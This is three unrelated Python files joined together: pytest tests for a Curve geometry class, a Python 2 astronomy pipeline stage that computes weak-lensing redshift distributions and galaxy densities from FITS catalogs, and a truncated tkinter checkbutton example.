(slice(None), None),
(slice(None), slice(None)),
None,
np.zeros((2, 3)),
])
def test_getitem_error(indexer):
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
with pytest.raises((TypeError, IndexError)):
_ = curve[indexer]
def test_concatenate():
left_curve = Curve([(1, 2), (5, 6)])
right_curve = Curve([(3, 4), (7, 8)])
expected_curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
assert left_curve + right_curve == expected_curve
left_curve += right_curve
assert left_curve == Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
def test_concatenate_parametric():
left_curve = Curve([(1, 2), (5, 6)], tdata=[0, 1])
right_curve = Curve([(3, 4), (7, 8)], tdata=[2, 3])
expected_curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)], tdata=[0, 1, 2, 3])
assert (left_curve + right_curve).t == pytest.approx(expected_curve.t)
def test_insert_point():
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
point = Point([10, 20])
curve1 = curve.insert(1, point)
assert curve1 == Curve([(1, 10, 2, 3, 4), (5, 20, 6, 7, 8)])
def test_insert_curve():
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
sub_curve = Curve([(10, 20), (30, 40)])
curve1 = curve.insert(-3, sub_curve)
assert curve1 == Curve([(1, 10, 20, 2, 3, 4), (5, 30, 40, 6, 7, 8)])
def test_append_point():
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
point = Point([10, 20])
curve1 = curve.append(point)
assert curve1 == Curve([(1, 2, 3, 4, 10), (5, 6, 7, 8, 20)])
def test_append_curve():
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
sub_curve = Curve([(10, 20), (30, 40)])
curve1 = curve.append(sub_curve)
assert curve1 == Curve([(1, 2, 3, 4, 10, 20), (5, 6, 7, 8, 30, 40)])
@pytest.mark.parametrize('index, expected_data', [
(0, [(2, 3, 4), (6, 7, 8)]),
(1, [(1, 3, 4), (5, 7, 8)]),
(-1, [(1, 2, 3), (5, 6, 7)]),
(-2, [(1, 2, 4), (5, 6, 8)]),
])
def test_delete_point(index, expected_data):
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
assert curve.delete(index) == Curve(expected_data)
@pytest.mark.parametrize('index, expected_data', [
(slice(None, 2), [(3, 4), (7, 8)]),
(slice(-2, None), [(1, 2), (5, 6)]),
(slice(None, None, 2), [(2, 4), (6, 8)]),
])
def test_delete_curve(index, expected_data):
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
assert curve.delete(index) == Curve(expected_data)
@pytest.mark.parametrize('axis, expected_data', [
(Axis.X, np.array([1, 2, 3, 4])),
(Axis.Y, np.array([5, 6, 7, 8])),
(Axis.Z, np.array([9, 10, 11, 12])),
(-1, np.array([9, 10, 11, 12])),
])
def test_get_values(axis, expected_data):
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8), (9, 10, 11, 12)])
assert curve.values(axis) == pytest.approx(expected_data)
def test_insert_dim():
curve = Curve([(1, 2, 3, 4), (9, 10, 11, 12)])
curve1 = curve.insertdim(1, [5, 6, 7, 8])
assert curve1 == Curve([(1, 2, 3, 4), (5, 6, 7, 8), (9, 10, 11, 12)])
def test_append_dim():
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
curve1 = curve.appenddim([9, 10, 11, 12])
assert curve1 == Curve([(1, 2, 3, 4), (5, 6, 7, 8), (9, 10, 11, 12)])
@pytest.mark.parametrize('index, expected_data', [
(Axis.X, [(5, 6, 7, 8), (9, 10, 11, 12)]),
(Axis.Y, [(1, 2, 3, 4), (9, 10, 11, 12)]),
(Axis.Z, [(1, 2, 3, 4), (5, 6, 7, 8)]),
(-1, [(1, 2, 3, 4), (5, 6, 7, 8)]),
])
def test_delete_dim(index, expected_data):
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8), (9, 10, 11, 12)])
curve1 = curve.deletedim(index)
assert curve1 == Curve(expected_data)
def test_delete_dim_error():
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
with pytest.raises(ValueError):
curve.deletedim(axis=Axis.Y)
@pytest.mark.parametrize('curve_data, expected_data', [
([(4, 2, 3, 1), (8, 6, 7, 5)], [(4, 2, 3, 1), (8, 6, 7, 5)]),
([(3, 2, 1, 4, 2), (7, 6, 5, 8, 6)], [(3, 2, 1, 4), (7, 6, 5, 8)]),
([(3, 1, 2, 1, 4, 2), (7, 5, 6, 5, 8, 6)], [(3, 1, 2, 4), (7, 5, 6, 8)]),
])
def test_unique(curve_data, expected_data):
assert Curve(curve_data).unique() == Curve(expected_data)
@pytest.mark.parametrize('curve_data, isa, expected_data', [
([(1, 2, np.nan, 3, 2, 4), (5, 6, 1, 7, np.inf, 8)],
lambda x: np.isnan(x) | np.isinf(x), [(1, 2, 3, 4), (5, 6, 7, 8)]),
([(1, 2, 3, 4), (5, 6, 7, 8)],
lambda x: x == [2, 6], [(1, 3, 4), (5, 7, 8)]),
([(1, 2, 3, 4), (5, 6, 7, 8)],
lambda x: [1, 2], [(1, 4), (5, 8)]),
])
def test_drop(curve_data, isa, expected_data):
assert Curve(curve_data).drop(isa) == Curve(expected_data)
def test_isplane():
t = np.linspace(0, np.pi*2, 100)
x = np.sin(t)
y = t
z = t
curve = Curve([x, y, z])
assert curve.isplane
def test_isnotplane():
t = np.linspace(0, np.pi * 2, 100)
x = np.sin(t)
y = np.cos(t)
z = x * y
curve = Curve([x, y, z])
assert not curve.isplane
|
import numpy as np
import twopoint
import fitsio as fio
import healpy as hp
from numpy.lib.recfunctions import append_fields, rename_fields
from .stage import PipelineStage, NOFZ_NAMES
import subprocess
import os
import warnings
class nofz(PipelineStage):
name = "nofz"
inputs = {}
outputs = {
"weight" : "weight.npy" ,
"nz_source" : "nz_source_zbin.npy" ,
"nz_lens" : "nz_lens_zbin.npy" ,
"nz_source_txt" : "source.nz" ,
"nz_lens_txt" : "lens.nz" ,
"gold_idx" : "gold_idx.npy" ,
"lens_idx" : "lens_idx.npy" ,
"ran_idx" : "ran_idx.npy" ,
"randoms" : "randoms_zbin.npy" ,
"cov_ini" : "cov.ini" ,
"2pt" : "2pt.fits" ,
"metadata" : "metadata.yaml"
}
def __init__(self, param_file):
"""
Produces n(z)s from input catalogs.
"""
super(nofz,self).__init__(param_file)
# Load data
self.load_data()
if 'pzbin_col' in self.gold.dtype.names:
print 'ignoring any specified bins, since a bin column has been supplied in gold file'
# Construct new weight and cache - move to catalog
if 'weight' in self.pz.dtype.names:
self.weight = np.sqrt(self.pz['weight'] * self.shape['weight'])
else:
self.weight = self.shape['weight']
filename = self.output_path("weight")
np.save(filename, np.vstack((self.gold['objid'], self.weight)).T)
# deal with photo-z weights for lenses later...
# Setup binning
if self.params['pdf_type']!='pdf':
self.z = (np.linspace(0.,4.,401)[1:]+np.linspace(0.,4.,401)[:-1])/2.+1e-4 # 1e-4 for buzzard redshift files
self.dz = self.z[1]-self.z[0]
self.binlow = self.z-self.dz/2.
self.binhigh = self.z+self.dz/2.
else:
self.binlow = np.array(self.params['pdf_z'][:-1])
self.binhigh = np.array(self.params['pdf_z'][1:])
self.z = (self.binlow+self.binhigh)/2.
self.dz = self.binlow[1]-self.binlow[0]
if hasattr(self.params['zbins'], "__len__"):
self.tomobins = len(self.params['zbins']) - 1
self.binedges = self.params['zbins']
else:
self.tomobins = self.params['zbins']
self.binedges = self.find_bin_edges(self.pz['pzbin'][self.mask], self.tomobins, w = self.shape['weight'][self.mask])
if self.params['lensfile'] != 'None':
if hasattr(self.params['lens_zbins'], "__len__"):
self.lens_tomobins = len(self.params['lens_zbins']) - 1
self.lens_binedges = self.params['lens_zbins']
else:
self.lens_tomobins = self.params['lens_zbins']
self.lens_binedges = self.find_bin_edges(self.lens_pz['pzbin'], self.lens_tomobins, w = self.lens['weight'])
return
def run(self):
# Calculate source n(z)s and write to file
if self.params['has_sheared']:
pzbin = [self.pz['pzbin'],self.pz_1p['pzbin'],self.pz_1m['pzbin'],self.pz_2p['pzbin'],self.pz_2m['pzbin']]
else:
pzbin = self.pz['pzbin']
if self.params['pdf_type']!='pdf':
zbin, self.nofz = self.build_nofz_bins(
self.tomobins,
self.binedges,
pzbin,
self.pz_nofz['pzstack'],
self.params['pdf_type'],
self.weight,
shape=True)
else:
pdfs = np.zeros((len(self.pz),len(self.z)))
for i in range(len(self.z)):
pdfs[:,i] = self.pz['pzstack'+str(i)]
zbin, self.nofz = self.build_nofz_bins(
self.tomobins,
self.binedges,
pzbin,
pdfs,
self.params['pdf_type'],
self.weight,
shape=True)
self.get_sigma_e(zbin,self.tomobins,self.shape)
self.get_neff(zbin,self.tomobins,self.shape)
if self.params['has_sheared']:
zbin,zbin_1p,zbin_1m,zbin_2p,zbin_2m=zbin
np.save(self.output_path("nz_source"), np.vstack((self.gold['objid'], zbin,zbin_1p,zbin_1m,zbin_2p,zbin_2m)).T)
else:
np.save(self.output_path("nz_source"), np.vstack((self.gold['objid'], zbin)).T)
# Calculate lens n(z)s and write to file
if self.params['lensfile'] != 'None':
lens_zbin, self.lens_nofz = self.build_nofz_bins(
self.lens_tomobins,
self.lens_binedges,
self.lens_pz['pzbin'],
self.lens_pz['pzstack'],
self.params['lens_pdf_type'],
self.lens['weight'])
np.save(self.output_path("nz_lens") , np.vstack((self.lens['objid'], lens_zbin)).T)
ran_binning = np.digitize(self.randoms['ranbincol'], self.lens_binedges, right=True) - 1
np.save(self.output_path("randoms"), ran_binning)
self.get_lens_neff(lens_zbin,self.lens_tomobins,self.lens)
def write(self):
"""
Write lens and source n(z)s to fits file for tomographic and non-tomographic cases.
"""
nz_source = twopoint.NumberDensity(
NOFZ_NAMES[0],
self.binlow,
self.z,
self.binhigh,
[self.nofz[i,:] for i in range(self.tomobins)])
nz_source.ngal = self.neff
nz_source.sigma_e = self.sigma_e
nz_source.area = self.area
kernels = [nz_source]
np.savetxt(self.output_path("nz_source_txt"), np.vstack((self.binlow, self.nofz)).T)
if self.params['lensfile'] != 'None':
nz_lens = twopoint.NumberDensity(
NOFZ_NAMES[1],
self.binlow,
self.z,
self.binhigh,
[self.lens_nofz[i,:] for i in range(self.lens_tomobins)])
nz_lens.ngal = self.lens_neff
nz_lens.area = self.area
kernels.append(nz_lens)
np.savetxt(self.output_path("nz_lens_txt"), np.vstack((self.binlow, self.lens_nofz)).T)
data = twopoint.TwoPointFile([], kernels, None, None)
data.to_fits(self.output_path("2pt"), clobber=True)
self.write_metadata()
def write_metadata(self):
import yaml
data = {
"neff": self.neff,
"neffc": self.neffc,
"tomobins": self.tomobins,
"sigma_e": self.sigma_e,
"sigma_ec": self.sigma_ec,
"mean_e1":self.mean_e1,
"mean_e2":self.mean_e2,
"area": self.area,
"repository_version:": find_git_hash(),
}
if 'pzbin_col' in self.gold.dtype.names:
data["source_bins"] = "gold_file_bins"
else:
if type(self.binedges) is list:
data.update({ "source_bins" : self.binedges })
else:
data.update({ "source_bins" : self.binedges.tolist() })
if self.params['lensfile'] != 'None':
data.update({ "lens_neff" : self.lens_neff,
"lens_tomobins" : self.lens_tomobins,
"lens_bins" : self.lens_binedges })
print data
filename = self.output_path('metadata')
open(filename, 'w').write(yaml.dump(data))
def load_array(self,d,file):
if self.params['has_sheared'] & (file=='shapefile'):
d['flags_1p'] = 'flags_select_1p'
d['flags_1m'] = 'flags_select_1m'
d['flags_2p'] = 'flags_select_2p'
d['flags_2m'] = 'flags_select_2m'
if self.params['pdf_type']=='pdf':
            keys = [key for key in d.keys() if (d[key] is not None)&(key != 'pzstack')]
else:
keys = [key for key in d.keys() if (d[key] is not None)]
if 'objid' in keys:
dtypes = [('objid','i8')]
else:
raise ValueError('missing object id in '+file)
        dtypes += [(key,'f8') for key in keys if (key != 'objid')]
if self.params['pdf_type']=='pdf':
            dtypes += [('pzstack'+str(i),'f8') for i in range(len(self.params['pdf_z']))]
fits = fio.FITS(self.params[file])[-1]
array = fits.read(columns=[d[key] for key in keys])
array = rename_fields(array,{v: k for k, v in d.iteritems()})
if ('weight' not in array.dtype.names) & (file=='shapefile'):
array = append_fields(array, 'weight', np.ones(len(array)), usemask=False)
if self.params['pdf_type']=='pdf':
for i in range(len(self.params['pdf_z'])):
array['pzstack'+str(i)]=fits.read(columns=d['pzstack']+str(i))
if np.any(np.diff(array['objid']) < 1):
raise ValueError('misordered or duplicate ids in '+file)
return array
def load_data(self):
"""
Load data files.
"""
import time
import importlib
col = importlib.import_module('.'+self.params['dict_file'],'pipeline')
# def lowercase_array(arr):
# old_names = arr.dtype.names
# new_names = [name.lower() for name in old_names]
# renames = dict(zip(old_names, new_names))
# return rename_fields(arr, renames)
t0 = time.time()
self.gold = self.load_array(col.gold_dict, 'goldfile')
print 'Done goldfile',time.time()-t0,self.gold.dtype.names
self.shape = self.load_array(col.shape_dict, 'shapefile')
print 'Done shapefile',time.time()-t0,self.shape.dtype.names
self.pz = self.load_array(col.pz_bin_dict, 'photozfile')
print 'Done pzfile',time.time()-t0,self.pz.dtype.names
if self.params['has_sheared']:
self.pz_1p = self.load_array(col.pz_bin_dict, 'photozfile_1p')
print 'Done pz1pfile',time.time()-t0,self.pz_1p.dtype.names
self.pz_1m = self.load_array(col.pz_bin_dict, 'photozfile_1m')
print 'Done pz1mfile',time.time()-t0,self.pz_1m.dtype.names
self.pz_2p = self.load_array(col.pz_bin_dict, 'photozfile_2p')
print 'Done pz2pfile',time.time()-t0,self.pz_2p.dtype.names
self.pz_2m = self.load_array(col.pz_bin_dict, 'photozfile_2m')
print 'Done pz2mfile',time.time()-t0,self.pz_2m.dtype.names
self.pz_nofz = self.load_array(col.pz_stack_dict, 'photozfile_nz')
print 'Done pznofzfile',time.time()-t0,self.pz_nofz.dtype.names
if self.params['lensfile'] != 'None':
self.lens = self.load_array(col.lens_dict, 'lensfile')
print 'Done lensfile',time.time()-t0,self.lens.dtype.names
self.lens_pz = self.load_array(col.lens_pz_dict, 'lensfile')
print 'Done lens_pzfile',time.time()-t0,self.lens_pz.dtype.names
if 'm1' not in self.shape.dtype.names:
self.shape = append_fields(self.shape, 'm1', self.shape['m2'], usemask=False)
if 'm2' not in self.shape.dtype.names:
self.shape = append_fields(self.shape, 'm2', self.shape['m1'], usemask=False)
if self.params['oneplusm']==False:
print 'converting m to 1+m'
self.shape['m1'] = np.copy(self.shape['m1'])+1.
self.shape['m2'] = np.copy(self.shape['m2'])+1.
        if 'c1' in self.shape.dtype.names:
            self.shape['e1'] -= self.shape['c1']
            self.shape['e2'] -= self.shape['c2']
            # zero out the additive corrections so they cannot be applied twice
            self.shape['c1'] = 0.
            self.shape['c2'] = 0.
if self.params['flip_e2']==True:
print 'flipping e2'
self.shape['e2']*=-1
if 'pzbin' not in self.lens_pz.dtype.names:
self.lens_pz = append_fields(self.lens_pz, 'pzbin', self.lens_pz['pzstack'], usemask=False)
if 'pzstack' not in self.lens_pz.dtype.names:
self.lens_pz = append_fields(self.lens_pz, 'pzstack', self.lens_pz['pzbin'], usemask=False)
if not ((len(self.gold)==len(self.shape))
& (len(self.gold)==len(self.pz))
& (len(self.gold)==len(self.pz_nofz))):
raise ValueError('shape, gold, or photoz length mismatch')
if self.params['has_sheared']:
if not ((len(self.gold)==len(self.pz_1p))
& (len(self.gold)==len(self.pz_1m))
& (len(self.gold)==len(self.pz_2p))
& (len(self.gold)==len(self.pz_2m))):
raise ValueError('shape, gold, or photoz length mismatch')
if self.params['lensfile'] != 'None':
if (len(self.lens)!=len(self.lens_pz)):
raise ValueError('lens and lens_pz length mismatch')
if self.params['lensfile'] != 'None':
keys = [key for key in col.ran_dict.keys() if (col.ran_dict[key] is not None)]
fits = fio.FITS(self.params['randomfile'])[-1]
dtypes=[(key,'f8') for key in keys]
self.randoms = np.empty(fits.read_header()['NAXIS2'], dtype = dtypes)
for key in keys:
self.randoms[key]=fits.read(columns=[col.ran_dict[key]])
if self.params['test_run']==True:
idx = np.random.choice(np.arange(len(self.gold)),100000,replace=False)
np.save(self.output_path("gold_idx"), idx)
self.gold = self.gold[idx]
self.shape = self.shape[idx]
self.pz = self.pz[idx]
self.pz_nofz = self.pz_nofz[idx]
if self.params['has_sheared']:
self.pz_1p = self.pz_1p[idx]
self.pz_1m = self.pz_1m[idx]
self.pz_2p = self.pz_2p[idx]
self.pz_2m = self.pz_2m[idx]
if self.params['lensfile'] != 'None':
idx = np.random.choice(np.arange(len(self.lens)),100000,replace=False)
np.save(self.output_path("lens_idx"), idx)
self.lens = self.lens[idx]
self.lens_pz = self.lens_pz[idx]
idx = np.random.choice(np.arange(len(self.randoms)),100000,replace=False)
np.save(self.output_path("ran_idx"), idx)
self.randoms = self.randoms[idx]
if 'pzbin_col' in self.gold.dtype.names:
mask = (self.gold['pzbin_col'] >= 0)
else:
mask = (self.pz['pzbin'] > self.params['zlims'][0]) & (self.pz['pzbin'] <= self.params['zlims'][1])
if self.params['has_sheared']:
mask_1p = (self.pz_1p['pzbin'] > self.params['zlims'][0]) & (self.pz_1p['pzbin'] <= self.params['zlims'][1])
mask_1m = (self.pz_1m['pzbin'] > self.params['zlims'][0]) & (self.pz_1m['pzbin'] <= self.params['zlims'][1])
mask_2p = (self.pz_2p['pzbin'] > self.params['zlims'][0]) & (self.pz_2p['pzbin'] <= self.params['zlims'][1])
mask_2m = (self.pz_2m['pzbin'] > self.params['zlims'][0]) & (self.pz_2m['pzbin'] <= self.params['zlims'][1])
print 'ngal',np.sum(mask),np.sum(mask_1p),np.sum(mask_1m),np.sum(mask_2p),np.sum(mask_2m)
if 'flags' in self.shape.dtype.names:
mask = mask & (self.shape['flags']==0)
if self.params['has_sheared']:
mask_1p = mask_1p & (self.shape['flags_1p']==0)
mask_1m = mask_1m & (self.shape['flags_1m']==0)
mask_2p = mask_2p & (self.shape['flags_2p']==0)
mask_2m = mask_2m & (self.shape['flags_2m']==0)
print 'ngal',np.sum(mask),np.sum(mask_1p),np.sum(mask_1m),np.sum(mask_2p),np.sum(mask_2m)
if 'flags' in self.pz.dtype.names:
mask = mask & (self.pz['flags']==0)
if self.params['has_sheared']:
mask_1p = mask_1p & (self.pz_1p['flags']==0)
mask_1m = mask_1m & (self.pz_1m['flags']==0)
mask_2p = mask_2p & (self.pz_2p['flags']==0)
mask_2m = mask_2m & (self.pz_2m['flags']==0)
print 'hardcoded spt region cut'
mask = mask & (self.shape['dec']<-35)
if self.params['has_sheared']:
mask_1p = mask_1p & (self.shape['dec']<-35)
mask_1m = mask_1m & (self.shape['dec']<-35)
mask_2p = mask_2p & (self.shape['dec']<-35)
mask_2m = mask_2m & (self.shape['dec']<-35)
np.save('radec.npy',np.vstack((self.shape['ra'],self.shape['dec'])).T[mask])
print np.sum(mask)
if 'footprintfile' in self.params.keys():
print 'cutting catalog to footprintfile'
footmask = np.in1d(hp.ang2pix(4096, np.pi/2.-np.radians(self.shape['dec']),np.radians(self.shape['ra']), nest=False),
fio.FITS(self.params['footprintfile'])[-1].read()['HPIX'],assume_unique=False)
mask = mask & footmask
if self.params['has_sheared']:
mask_1p = mask_1p & footmask
mask_1m = mask_1m & footmask
mask_2p = mask_2p & footmask
mask_2m = mask_2m & footmask
print 'ngal final',np.sum(mask),np.sum(mask & mask_1p & mask_1m & mask_2p & mask_2m)
if self.params['has_sheared']:
full_mask = mask | mask_1p | mask_1m | mask_2p | mask_2m
self.pz_1p = self.pz_1p[full_mask]
self.pz_1m = self.pz_1m[full_mask]
self.pz_2p = self.pz_2p[full_mask]
self.pz_2m = self.pz_2m[full_mask]
self.mask = mask[full_mask]
self.mask_1p = mask_1p[full_mask]
self.mask_1m = mask_1m[full_mask]
self.mask_2p = mask_2p[full_mask]
self.mask_2m = mask_2m[full_mask]
else:
full_mask = mask
self.mask = mask[full_mask]
self.gold = self.gold[full_mask]
self.shape = self.shape[full_mask]
self.pz = self.pz[full_mask]
self.pz_nofz = self.pz_nofz[full_mask]
return
def build_nofz_bins(self, zbins, edge, bin_col, stack_col, pdf_type, weight,shape=False):
"""
Build an n(z), non-tomographic [:,0] and tomographic [:,1:].
"""
if shape&(self.params['has_sheared']):
if 'pzbin_col' in self.gold.dtype.names:
xbins = self.gold['pzbin_col']
else:
xbins0=[]
for x in bin_col:
xbins0.append(np.digitize(x, edge, right=True) - 1)
xbins = xbins0[0]
else:
if 'pzbin_col' in self.gold.dtype.names:
xbins0 = self.gold['pzbin_col']
else:
xbins0 = np.digitize(bin_col, edge, right=True) - 1
xbins=xbins0
# Stack n(z)
nofz = np.zeros((zbins, len(self.z)))
# MC Sample of pdf or redmagic (if redmagic, takes random draw from gaussian of width 0.01)
if (pdf_type == 'sample') | (pdf_type == 'rm'):
if pdf_type == 'rm':
stack_col = np.random.normal(stack_col, self.lens_pz['pzerr']*np.ones(len(stack_col)))
for i in range(zbins):
mask = (xbins == i)
if shape:
mask = mask&self.mask
if self.params['has_sheared']:
mask_1p = (xbins0[1] == i)&self.mask_1p
mask_1m = (xbins0[2] == i)&self.mask_1m
mask_2p = (xbins0[3] == i)&self.mask_2p
mask_2m = (xbins0[4] == i)&self.mask_2m
m1 = np.mean(self.shape['m1'][mask&self.mask])
m2 = np.mean(self.shape['m2'][mask&self.mask])
m1 += (np.mean(self.shape['e1'][mask_1p&self.mask_1p]) - np.mean(self.shape['e1'][mask_1m&self.mask_1m])) / (2.*self.params['dg'])
m2 += (np.mean(self.shape['e2'][mask_2p&self.mask_2p]) - np.mean(self.shape['e2'][mask_2m&self.mask_2m])) / (2.*self.params['dg'])
m1 = m1*np.ones(len(mask))
m2 = m2*np.ones(len(mask))
                    else:
                        m1 = self.shape['m1']
                        m2 = self.shape['m2']
                    # scale by the mean response without mutating the shared
                    # weight array across bin iterations
                    w = weight * (m1+m2)/2.
                    nofz[i,:],b = np.histogram(stack_col[mask], bins=np.append(self.binlow, self.binhigh[-1]), weights=w[mask])
                    nofz[i,:] /= np.sum(nofz[i,:]) * self.dz
# Stacking pdfs
elif pdf_type == 'pdf':
for i in xrange(zbins):
mask = (xbins == i)
if shape:
mask = mask&self.mask
nofz[i,:] = np.sum((stack_col[mask].T * weight[mask]).T, axis=0)
nofz[i,:] /= np.sum(nofz[i,:]) * self.dz
return xbins0, nofz
def find_bin_edges(self, x, nbins, w=None):
"""
For an array x, returns the boundaries of nbins equal (possibly weighted by w) bins.
From github.com/matroxel/destest.
"""
        if w is None:
            xs = np.sort(x)
            r = np.linspace(0., 1., nbins + 1) * (len(x) - 1)
            return xs[r.astype(int)]
fail = False
ww = np.sum(w) / nbins
i = np.argsort(x)
        k = np.linspace(0., 1., nbins + 1) * (len(x) - 1)
k = k.astype(int)
r = np.zeros((nbins + 1))
ist = 0
for j in xrange(1,nbins):
if k[j] < r[j-1]:
print 'Random weight approx. failed - attempting brute force approach'
fail = True
break
w0 = np.sum(w[i[ist:k[j]]])
if w0 <= ww:
for l in xrange(k[j], len(x)):
w0 += w[i[l]]
if w0 > ww:
r[j] = x[i[l]]
ist = l
break
else:
for l in xrange(k[j], 0, -1):
w0 -= w[i[l]]
if w0 < ww:
r[j] = x[i[l]]
ist = l
break
if fail:
ist = np.zeros((nbins+1))
ist[0]=0
for j in xrange(1, nbins):
wsum = 0.
for k in xrange(ist[j-1].astype(int), len(x)):
wsum += w[i[k]]
if wsum > ww:
r[j] = x[i[k-1]]
ist[j] = k
break
r[0] = x[i[0]]
r[-1] = x[i[-1]]
return r
def get_neff(self, zbin, tomobins, cat):
"""
Calculate neff for catalog.
"""
if not hasattr(self,'area'):
self.get_area()
self.neff = []
self.neffc = []
for i in range(self.tomobins):
if self.params['has_sheared']:
mask = (zbin[0] == i)
mask_1p = (zbin[1] == i)
mask_1m = (zbin[2] == i)
mask_2p = (zbin[3] == i)
mask_2m = (zbin[4] == i)
m1 = np.mean(cat['m1'][mask&self.mask])
m2 = np.mean(cat['m2'][mask&self.mask])
m1 += (np.mean(cat['e1'][mask_1p&self.mask_1p]) - np.mean(cat['e1'][mask_1m&self.mask_1m])) / (2.*self.params['dg'])
m2 += (np.mean(cat['e2'][mask_2p&self.mask_2p]) - np.mean(cat['e2'][mask_2m&self.mask_2m])) / (2.*self.params['dg'])
m1 = m1*np.ones(len(mask))
m2 = m2*np.ones(len(mask))
else:
mask = (zbin == i)
m1 = cat['m1']
m2 = cat['m2']
mask = mask & self.mask
print i,np.sum(mask)
if self.params['has_sheared']:
e1 = cat['e1'][mask]
e2 = cat['e2'][mask]
w = cat['weight'][mask]
s = (m1[mask]+m2[mask])/2.
var = cat['cov00'][mask] + cat['cov11'][mask]
var[var>2] = 2.
else:
e1 = cat['e1'][mask]
e2 = cat['e2'][mask]
w = cat['weight'][mask]
s = (m1[mask]+m2[mask])/2.
snvar = 0.24#np.sqrt((cat['e1'][mask][cat['snr'][mask]>100].var()+cat['e2'][mask][cat['snr'][mask]>100].var())/2.)
var = 1./w - snvar**2
var[var < 0.] = 0.
w[w > snvar**-2] = snvar**-2
a = np.sum(w)**2
b = np.sum(w**2)
c = self.area * 60. * 60.
self.neff.append( a/b/c )
self.neffc.append( ((self.sigma_ec[i]**2 * np.sum(w * s)**2) / np.sum(w**2 * (s**2 * self.sigma_ec[i]**2 + var/2.))) / self.area / 60**2 )
return
def get_lens_neff(self, zbin, tomobins, cat):
"""
Calculate neff for catalog.
"""
if not hasattr(self,'area'):
self.get_area()
self.lens_neff = []
for i in range(tomobins):
mask = (zbin == i)
a = np.sum(cat['weight'][mask])**2
b = np.sum(cat['weight'][mask]**2)
c = self.area * 60. * 60.
self.lens_neff.append(np.asscalar( a/b/c ))
return
def get_sigma_e(self, zbin, tomobins, cat):
"""
Calculate sigma_e for shape catalog.
"""
if not hasattr(self,'area'):
self.get_area()
self.sigma_e = []
self.sigma_ec = []
self.mean_e1 = []
self.mean_e2 = []
for i in range(tomobins):
if self.params['has_sheared']:
mask = (zbin[0] == i)
mask_1p = (zbin[1] == i)
mask_1m = (zbin[2] == i)
mask_2p = (zbin[3] == i)
mask_2m = (zbin[4] == i)
m1 = np.mean(cat['m1'][mask&self.mask])
m2 = np.mean(cat['m2'][mask&self.mask])
print 'rg',m1,m2
m1 += (np.mean(cat['e1'][mask_1p&self.mask_1p]) - np.mean(cat['e1'][mask_1m&self.mask_1m])) / (2.*self.params['dg'])
m2 += (np.mean(cat['e2'][mask_2p&self.mask_2p]) - np.mean(cat['e2'][mask_2m&self.mask_2m])) / (2.*self.params['dg'])
print 'rs',(np.mean(cat['e1'][mask_1p&self.mask_1p]) - np.mean(cat['e1'][mask_1m&self.mask_1m])) / (2.*self.params['dg']),(np.mean(cat['e2'][mask_2p&self.mask_2p]) - np.mean(cat['e2'][mask_2m&self.mask_2m])) / (2.*self.params['dg'])
m1 = m1*np.ones(len(mask))
m2 = m2*np.ones(len(mask))
print 'sn',i,np.sum(self.mask_1p),np.sum(self.mask_1m),np.sum(self.mask_2p),np.sum(self.mask_2m)
print 'sn',i,np.sum(mask_1p&self.mask_1p),np.sum(mask_1m&self.mask_1m),np.sum(mask_2p&self.mask_2p),np.sum(mask_2m&self.mask_2m)
else:
mask = (zbin == i)
m1 = cat['m1']
m2 = cat['m2']
mask = mask & self.mask
if self.params['has_sheared']:
e1 = cat['e1'][mask]
e2 = cat['e2'][mask]
w = np.ones(len(cat[mask]))#cat['weight'][mask]
s = (m1[mask]+m2[mask])/2.
var = cat['cov00'][mask] + cat['cov11'][mask]
var[var>2] = 2.
else:
e1 = cat['e1'][mask]
e2 = cat['e2'][mask]
w = cat['weight'][mask]
s = (m1[mask]+m2[mask])/2.
snvar = 0.24#np.sqrt((cat['e1'][mask][cat['snr'][mask]>100].var()+cat['e2'][mask][cat['snr'][mask]>100].var())/2.)
print i,'snvar',snvar
var = 1./w - snvar**2
var[var < 0.] = 0.
w[w > snvar**-2] = snvar**-2
print 'var',var.min(),var.max()
self.mean_e1.append(np.asscalar(np.average(cat['e1'][mask],weights=cat['weight'][mask])))
self.mean_e2.append(np.asscalar(np.average(cat['e2'][mask],weights=cat['weight'][mask])))
a1 = np.sum(w**2 * (e1-self.mean_e1[i])**2)
a2 = np.sum(w**2 * (e2-self.mean_e2[i])**2)
b = np.sum(w**2)
c = np.sum(w * s)
print len(w),w
d = np.sum(w)
print i,a1,a2,b,c,d
self.sigma_e.append( np.sqrt( (a1/c**2 + a2/c**2) * (d**2/b) / 2. ) )
self.sigma_ec.append( np.sqrt( np.sum(w**2 * (e1**2 + e2**2 - var)) / (2.*np.sum(w**2 * s**2)) ) )
return
def get_area(self):
if hasattr(self,'area'):
return
if self.params['area']=='None':
import healpy as hp
pix=hp.ang2pix(4096, np.pi/2.-np.radians(self.shape['dec']),np.radians(self.shape['ra']), nest=True)
area=hp.nside2pixarea(4096)*(180./np.pi)**2
mask=np.bincount(pix)>0
self.area=np.sum(mask)*area
self.area=float(self.area)
print self.area
else:
self.area = self.params['area']
return
def find_git_hash():
try:
dirname = os.path.dirname(os.path.abspath(__file__))
head = subprocess.check_output("cd {0}; git show-ref HEADS".format(dirname), shell=True)
except subprocess.CalledProcessError:
head = "UNKNOWN"
warnings.warn("Unable to find git repository commit ID in {}".format(dirname))
return head.split()[0]
|
import tkinter as tk
window=tk.Tk()
window.title('my windows')
window.geometry('400x400')
l=tk.Label(window,bg='yellow',width=20,text='empty')
l.pack()
def print_selection():
    # use `and` instead of bitwise `&`: `&` binds tighter than `==`,
    # so `var1.get()==1 & (...)` would not compare the values as intended
    if (var1.get() == 1) and (var2.get() == 0):
        l.config(text='I love only Python')
    elif (var1.get() == 0) and (var2.get() == 1):
        l.config(text='I love only C++')
    elif (var1.get() == 0) and (var2.get() == 0):
        l.config(text='I do not love either')
    else:
        l.config(text='I love both')
var1=tk.IntVar()
var2=tk.IntVar()
c1 = tk.Checkbutton(window, text='Python', variable=var1, onvalue=1, offvalue=0,
